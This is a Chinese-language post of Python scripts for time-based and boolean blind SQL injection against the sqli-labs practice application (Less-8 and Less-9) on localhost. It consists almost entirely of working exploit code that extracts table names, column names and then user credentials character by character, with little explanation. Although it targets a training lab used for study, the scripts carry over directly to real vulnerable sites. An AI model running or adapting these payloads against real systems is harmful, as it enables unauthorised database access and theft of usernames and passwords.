时间盲注,boolen盲注,获取表、列、具体数据的函数
时间盲注:
获取表:
import requests
import time
url = "http://127.0.0.1/sqli-labs-php7-master/Less-9/index.php"
delay = 2
def is_injected(payload):
start = time.time()
try:
requests.get(url, params={"id": f"1' AND {payload}-- "}, timeout=delay+1)
except requests.exceptions.Timeout:
return True
return time.time() - start > delay
table = []
for pos in range(1, 30):
for c in range(32, 127):
payload = f"IF(ASCII(SUBSTR((SELECT table_name FROM information_schema.tables WHERE table_schema=DATABASE() LIMIT 1),{pos},1))={c},SLEEP({delay}),0)"
if is_injected(payload):
table.append(chr(c))
print("".join(table))
break
else:
break
print("".join(table))获取列:
import requests
import time
url = "http://127.0.0.1/sqli-labs-php7-master/Less-9/index.php"
delay = 2
table_name = "emails"
def is_injected(payload):
start = time.time()
try:
requests.get(url, params={"id": f"1' AND {payload}-- "}, timeout=delay + 1)
except requests.exceptions.Timeout:
return True
return time.time() - start > delay
column = []
for pos in range(1, 30):
for c in range(32, 127):
payload = f"IF(ASCII(SUBSTR((SELECT column_name FROM information_schema.columns WHERE table_name='{table_name}' LIMIT 1),{pos},1))={c},SLEEP({delay}),0)"
if is_injected(payload):
column.append(chr(c))
print("".join(column))
break
else:
break
print(''.join(column))获取具体数据:
import requests
import time
url = "http://127.0.0.1/sqli-labs-php7-master/Less-9/index.php"
delay = 2 #
table_name = "emails"
column_name = "id"
def is_injected(payload):
start = time.time()
try:
requests.get(url, params={"id": f"1' AND {payload}-- "}, timeout=delay + 1)
except requests.exceptions.Timeout:
return True
return time.time() - start > delay
data = []
for pos in range(1, 50):
for c in range(32, 127):
payload = f"IF(ASCII(SUBSTR((SELECT {column_name} FROM {table_name} LIMIT 1),{pos},1))={c},SLEEP({delay}),0)"
if is_injected(payload):
data.append(chr(c))
print("".join(data))
break
else:
break
print(''.join(data))boolen盲注:
获取表:
import requests
url = 'http://127.0.0.1/sqli-labs-php7-master/Less-8?id=1%27'
payload = 'and%20ascii(substr((select%20table_name%20from%20information_schema.tables%20where%20table_schema=' \
'database()%20limit%20{t},1),{w},1))={A}%20--%20k'
list1 = [64, 94, 96, 124, 176, 40, 41, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 173, 175, 95, 65, 66, 67, 68, 69, 70, 71,
72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 97, 98, 99, 100, 101, 102, 103,
104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 44]
str1 = "You are in..........."
str2 = bytes(str1, 'utf-8')
tables1 = ''
tables2 = ''
tables3 = ''
tables4 = ''
for i in range(0, 4):
for j in range(1, 10):
for s in list1:
p = payload.format(t=i, w=j, A=s)
u = requests.get(url+p)
if str2 in u.content:
if i == 0:
tables1 += chr(s)
print (u"正在对比第1个表,", u"第", j, u"个字符",tables1)
elif i == 1:
tables2 += chr(s)
print (u"正在对比第2个表,", u"第", j, u"个字符", tables2)
elif i == 2:
tables3 += chr(s)
print (u"正在对比第3个表,", u"第", j, u"个字符", tables3)
elif i == 3:
tables4 += chr(s)
print (u"正在对比第4个表,", u"第", j, u"个字符", tables4)
break
print ('tables1-->', tables1)
print ('tables2-->', tables2)
print ('tables3-->', tables3)
print ('tables4-->', tables4)获取列:
import requests
list1 = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v',
'w', 'x', 'y', 'z', '@', '1', '2', '3', '4', '5', '6', '7', '8', '9', '0', '!', '-', '|', '_', 'A', 'B', 'C',
'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y',
'Z', '.']
url = 'http://127.0.0.1/sqli-labs-php7-master/Less-8?id=1%27'
payload = '%20and%20left((select%20column_name%20from%20information_schema.columns%20where%20table_schema=%27security' \
'%27%20and%20table_name=%27users%27%20limit%20{w},1),{n})=%27{c}%27%20--%20k'
column = ['', '', '', '', '']
str1 = 'You are in...........'
str2 = bytes(str1, 'utf-8')
for j in range(0, 3):
for i in range(1, 9):
for l in list1:
p = payload.format(w=j, n=i, c=column[j]+l)
u = requests.get(url+p)
if str2 in u.content:
column[j] += l
print (u'正在对比第', j+1, u'个字段第', i, u'个字符', column[j])
break
for c in range(0, 5):
print ('column', c+1, '-->', column[c])获取具体数据:
import requests
list1 = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v',
'w', 'x', 'y', 'z', '@', '1', '2', '3', '4', '5', '6', '7', '8', '9', '0', '!', '-', '|', '_', 'A', 'B', 'C',
'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y',
'Z', '.']
url = 'http://127.0.0.1/sqli-labs-php7-master/Less-8?id=1%27'
payload = '%20and%20left((select%20username%20from%20users%20where%20id%20={n}),{w})=%27{d}%27%20--%20k'
str1 = 'You are in...........'
str2 = bytes(str1, 'utf-8')
username = ['', '', '', '', '', '', '', '', '', '', '', '', '', '']
password = ['', '', '', '', '', '', '', '', '', '', '', '', '', '']
for i in range(1, 15):
for j in range(1, 11):
for l in list1:
p = payload.format(n=i, w=j, d=username[i-1]+l)
u = requests.get(url+p)
if str2 in u.content:
username[i-1] += l
print (u'正在对比第', i, u'个记录的username的第', j, u'个字符', username[i-1])
payload2 = '%20and%20left((select%20password%20from%20users%20where%20id%20={n}),{w})=%27{d}%27%20--%20k'
for i in range(1, 15):
for j in range(1, 11):
for l in list1:
p = payload2.format(n=i, w=j, d=password[i-1]+l)
u = requests.get(url+p)
if str2 in u.content:
password[i-1] += l
print (u'正在对比第', i, u'个记录的password的第', j, u'个字符', password[i-1])
print ('id username password')
for i in range(1, 15):
print (i, '-', username[i-1], '-', password[i-1])